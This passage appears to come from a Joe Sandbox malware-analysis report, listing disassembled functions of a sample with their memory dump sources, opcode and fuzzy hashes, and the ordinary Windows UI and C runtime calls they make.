                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                                        • Instruction ID: 58d506998e48573843da9c43beaacaf8d3f69681002bb5435035d4b54b52a8d2
                                                                                        • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                                                        • Instruction Fuzzy Hash: C962F7716083459FCB26CF28C8806B9BBE1BF99304F09C96DE89E8B746D734E945CB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036F461 Relevance: .7, Instructions: 694COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                                        • Instruction ID: 946b010ea1aed0ff135ccf605b8cc071c2d6367cd05fe7313f55c6aaae8e6347
                                                                                        • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                                                        • Instruction Fuzzy Hash: 29524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00377153 Relevance: .5, Instructions: 536COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 42d9586ebb42a9cf7abdc7323e9034dc7e167f2c854d3b2aa395bab966b1fa25
                                                                                        • Instruction ID: 0423c085308683a302fd665b8909dd04c6a59aee34b955bddc8f810ee3e4723e
                                                                                        • Opcode Fuzzy Hash: 42d9586ebb42a9cf7abdc7323e9034dc7e167f2c854d3b2aa395bab966b1fa25
                                                                                        • Instruction Fuzzy Hash: 9412D6B16187069FC72ACF28C490679B7E1FF94304F10892EE99AC7781E338E555DB45
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036C426 Relevance: .5, Instructions: 454COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ce974bf8a3c5c88f282c71c0424c8b8ecbb83ccc4c962fba693f84f1f08f4bf3
                                                                                        • Instruction ID: c8f55f8d02c8417de349a875c903d38af384d42ef3bd84cf808147767d7a8a76
                                                                                        • Opcode Fuzzy Hash: ce974bf8a3c5c88f282c71c0424c8b8ecbb83ccc4c962fba693f84f1f08f4bf3
                                                                                        • Instruction Fuzzy Hash: C3F1CD316283018FC716CF28C49863ABBE5EF89314F15AA2EF4C5D725AD730E905CB56
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036E9B7 Relevance: .3, Instructions: 320COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0293637a8a35d16ffcf1095f75578e63b929906761b2df9a6a4cfa89d6e2e63b
                                                                                        • Instruction ID: 6578b4bac643d61e9ca5edfefde6a1cc9ed8c02bc29746f3fa8ed1a21c48e081
                                                                                        • Opcode Fuzzy Hash: 0293637a8a35d16ffcf1095f75578e63b929906761b2df9a6a4cfa89d6e2e63b
                                                                                        • Instruction Fuzzy Hash: A6E126755083908FC345CF29D89486ABFF0AF9A300F49495EF9C497392C335EA19DB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00374088 Relevance: .3, Instructions: 270COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                                        • Instruction ID: 2247c7723b00381923a6da82b8c1b2c642ab69dbfac614734133eb4a7eae6201
                                                                                        • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                                                        • Instruction Fuzzy Hash: C29189B02047498BDB36EF64D890BBE77C9EB50300F10892DF59ECB282EB38A555C752
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003743BF Relevance: .2, Instructions: 243COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                        • Instruction ID: 99e896decbdc2d6bd74e0cdc6011dff598a8761deba24938c1442c78236e65b0
                                                                                        • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                        • Instruction Fuzzy Hash: D38168713043468BDB37DE68C8C0BBD77D4AB91304F00C92DE98E8F682DB78A9859752
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003851C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 79874b52ca55104d0499c55ee84a721726cdd58b096172808fd29790dac9da3c
                                                                                        • Instruction ID: 94c5a9e9b14853bf4165cab5d92a55baeed07fefc909ae04f50859596e072757
                                                                                        • Opcode Fuzzy Hash: 79874b52ca55104d0499c55ee84a721726cdd58b096172808fd29790dac9da3c
                                                                                        • Instruction Fuzzy Hash: 3661BB39640F0857DF3BBA786891BBE6398EF51340F550DDAE483DF681DA91DD428301
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00384F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                        • Instruction ID: 55c5bcb4755805645e37a1da21db674f441d3c9b61e31c8d0aa0394d41e8376b
                                                                                        • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                                                        • Instruction Fuzzy Hash: CB517BA1204F4557DF377A28895ABBF23C99B12304F1909DDE983DFA82C605EE05C3D1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036EFE2 Relevance: .2, Instructions: 161COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 09e3f5f2ce5c05c7576b0d37eaeaa6d6d3900e97085fe1c76e45d9136c0fd64d
                                                                                        • Instruction ID: b3da9c58fa09853c9897c296bc10e42c5ba5c04167eab488504b9535123dc11c
                                                                                        • Opcode Fuzzy Hash: 09e3f5f2ce5c05c7576b0d37eaeaa6d6d3900e97085fe1c76e45d9136c0fd64d
                                                                                        • Instruction Fuzzy Hash: DC51F3315093D58FC703CF39D55046EBFE0AE9A314F4A49ADE4D95B247C231DA4ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003700B7 Relevance: .1, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bdbed9b5303bb61bc775235c42beefd1d6a1ff618febf51a01ffa4ca50a681cf
                                                                                        • Instruction ID: 0ae6c66e3ba1449e58d4d1605877ed70236333c659a3555adbb7b9efe06b48ab
                                                                                        • Opcode Fuzzy Hash: bdbed9b5303bb61bc775235c42beefd1d6a1ff618febf51a01ffa4ca50a681cf
                                                                                        • Instruction Fuzzy Hash: 4E51E0B1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3340D734E959CB96
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00373E0B Relevance: .1, Instructions: 112COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                        • Instruction ID: c40d61874474d8868eeee055ce3860808490de3be8a899477b5b23bf40404cb0
                                                                                        • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                        • Instruction Fuzzy Hash: E131D5B2A147568FCB25DF28C85116ABBE0FB95304F10852DE499D7741C739EA0ACB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _swprintf.LIBCMT ref: 0036E30E
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                          • Part of subcall function 00371DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,003A1030,?,0036D928,00000000,?,00000050,003A1030), ref: 00371DC4
                                                                                        • _strlen.LIBCMT ref: 0036E32F
                                                                                        • SetDlgItemTextW.USER32(?,0039E274,?), ref: 0036E38F
                                                                                        • GetWindowRect.USER32(?,?), ref: 0036E3C9
                                                                                        • GetClientRect.USER32(?,?), ref: 0036E3D5
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0036E475
                                                                                        • GetWindowRect.USER32(?,?), ref: 0036E4A2
                                                                                        • SetWindowTextW.USER32(?,?), ref: 0036E4DB
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 0036E4E3
                                                                                        • GetWindow.USER32(?,00000005), ref: 0036E4EE
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0036E51B
                                                                                        • GetWindow.USER32(00000000,00000002), ref: 0036E58D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                        • String ID: $%s:$CAPTION$d$t9
                                                                                        • API String ID: 2407758923-2433586919
                                                                                        • Opcode ID: 6c4e0d56159fafb8c50a104ebd9c991ee65dcc72804c5dc2ececdf2e67a35fae
                                                                                        • Instruction ID: f4dbd80d3ccb0fd6d38cf860c576374aace6694f3306b8eebe65834430a55f25
                                                                                        • Opcode Fuzzy Hash: 6c4e0d56159fafb8c50a104ebd9c991ee65dcc72804c5dc2ececdf2e67a35fae
                                                                                        • Instruction Fuzzy Hash: 1181B272208301AFD712DF68CC89E6FBBE9EF88704F04491DFA85D7254D671E9098B52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___free_lconv_mon.LIBCMT ref: 0038CB66
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C71E
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C730
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C742
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C754
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C766
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C778
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C78A
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C79C
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7AE
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7C0
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7D2
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7E4
                                                                                          • Part of subcall function 0038C701: _free.LIBCMT ref: 0038C7F6
                                                                                        • _free.LIBCMT ref: 0038CB5B
                                                                                          • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                          • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                        • _free.LIBCMT ref: 0038CB7D
                                                                                        • _free.LIBCMT ref: 0038CB92
                                                                                        • _free.LIBCMT ref: 0038CB9D
                                                                                        • _free.LIBCMT ref: 0038CBBF
                                                                                        • _free.LIBCMT ref: 0038CBD2
                                                                                        • _free.LIBCMT ref: 0038CBE0
                                                                                        • _free.LIBCMT ref: 0038CBEB
                                                                                        • _free.LIBCMT ref: 0038CC23
                                                                                        • _free.LIBCMT ref: 0038CC2A
                                                                                        • _free.LIBCMT ref: 0038CC47
                                                                                        • _free.LIBCMT ref: 0038CC5F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                        • String ID: h9
                                                                                        • API String ID: 161543041-554728239
                                                                                        • Opcode ID: 36ba1aee02b6e554c74fac25baeaa83e669c2acfadc22f14b2ba0ad6e5ae8524
                                                                                        • Instruction ID: d2c217fe15187b72ee245c6186fb6734c74bfa3ce5e9ae65b32cdb5d6d4b3ab5
                                                                                        • Opcode Fuzzy Hash: 36ba1aee02b6e554c74fac25baeaa83e669c2acfadc22f14b2ba0ad6e5ae8524
                                                                                        • Instruction Fuzzy Hash: 05315A316107459FEB23BB38D846B5AB7FAAF10310F6164A9E048DA292DF30AC45CB20
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003896F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00389705
                                                                                          • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                          • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                        • _free.LIBCMT ref: 00389711
                                                                                        • _free.LIBCMT ref: 0038971C
                                                                                        • _free.LIBCMT ref: 00389727
                                                                                        • _free.LIBCMT ref: 00389732
                                                                                        • _free.LIBCMT ref: 0038973D
                                                                                        • _free.LIBCMT ref: 00389748
                                                                                        • _free.LIBCMT ref: 00389753
                                                                                        • _free.LIBCMT ref: 0038975E
                                                                                        • _free.LIBCMT ref: 0038976C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID: 0d9
                                                                                        • API String ID: 776569668-2243828265
                                                                                        • Opcode ID: 274b5b4d5167f9761c38dce0868d1cb8bc80fe55fbe939276279225de372ec60
                                                                                        • Instruction ID: 223f141fb98f491d8d54d07eedacea47b7ba0bffd7687a7d648b3de2531fdc7a
                                                                                        • Opcode Fuzzy Hash: 274b5b4d5167f9761c38dce0868d1cb8bc80fe55fbe939276279225de372ec60
